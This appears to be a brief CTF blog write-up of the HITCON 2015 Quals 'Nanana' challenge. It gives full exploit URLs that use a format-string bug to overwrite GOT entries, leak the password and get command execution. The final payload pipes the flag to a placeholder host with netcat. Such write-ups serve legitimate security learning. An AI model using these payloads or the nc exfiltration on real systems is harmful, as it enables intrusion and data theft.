HITCON 2015 Quals: Nanana

Reading time ~1 minute

This challenge was solved by and the write up was written by one of my teammates, vek.

First, we got the correct password by changing the GOT of strlen into puts using a format string vuln, so that puts(password) got called. We did that with the following input:

http://54.92.88.102/cgi-bin/nanana?action=%2507hhx%2515%24hhn%25057hhx%2517%24hhn%25064hhx%2521%24hhn&username=0%10%60&password=2%10%60&job=1%10%60

With the password (“hitconctf2015givemeshell”), we could trigger a function whose first parameter we controlled ( do_job(username) ), so all we had to do was to change do_job’s address to system and username to the desired command, e.g

http://54.92.88.102/cgi-bin/nanana?action=%250192hhx%2515%24hhn&username=%2Fread_flag|nc%20X.X.X.X%2025565&password=hitconctf2015givemeshell&job=H%10%6>

HITCON CTF 2019 Quals: Reverse - EmojiVM

This challenge was a VM implemented where every instruction was an emoji. For the first part of the challenge we had to reverse a flag ch...… Continue reading

HITCON CTF 2019 Quals: Reverse - CoreDumb

Published on October 19, 2019

HITCON CTF 2019 Quals: Pwn - Crypto in the shell

Published on October 19, 2019